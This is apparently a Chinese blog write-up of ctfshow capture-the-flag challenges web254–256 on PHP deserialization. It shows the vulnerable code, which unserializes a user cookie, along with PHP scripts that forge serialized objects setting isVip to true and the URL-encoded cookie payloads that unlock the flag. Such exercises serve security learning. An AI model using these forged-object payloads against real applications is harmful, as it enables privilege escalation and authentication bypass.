ctfshow--反序列化WP
刷题随笔
web254
题目
直接传参,没啥好说的
web255
题目
<?php error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
echo "your flag is ".$flag;
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}
构造序列串
<?php
class ctfShowUser{
public $isVip;
public function __construct(){
$this->isVip=true;
}
}
$a=new ctfShowUser();
echo serialize($a);
得到序列串O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}
通过设置cookie传递后并没有发现flag
于是在本地试一下传参¥$_Cookie变量会变成什么
猜测应该是Cookie的user参数中的分号导致后面的序列串被分隔
通过URL编码即可
web256
题目
<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
if($this->username!==$this->password){
echo "your flag is ".$flag;
}
}else{
echo "no vip, no flag";
}
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
if($user->login($username,$password)){
if($user->checkVip()){
$user->vipOneKeyGetFlag();
}
}else{
echo "no vip,no flag";
}
}
构造序列化串
<?php
class ctfShowUser{
public $username;
public $isVip;
public function __construct(){
$this->isVip=true;
$this->username="aaa";
}
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?username=aaa&password=xxxxxx
O:11:"ctfShowUser":2:{s:8:"username";s:3:"aaa";s:5:"isVip";b:1;}
URL编码一下
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 开发者新选择:用DeepSeek实现Cursor级智能编程的免费方案
· Tinyfox 发生重大改版
· 独立开发经验谈:如何通过 Docker 让潜在客户快速体验你的系统
· 小米CR6606,CR6608,CR6609 启用SSH和刷入OpenWRT 23.05.5
· 近期最值得关注的AI技术报告与Agent综述!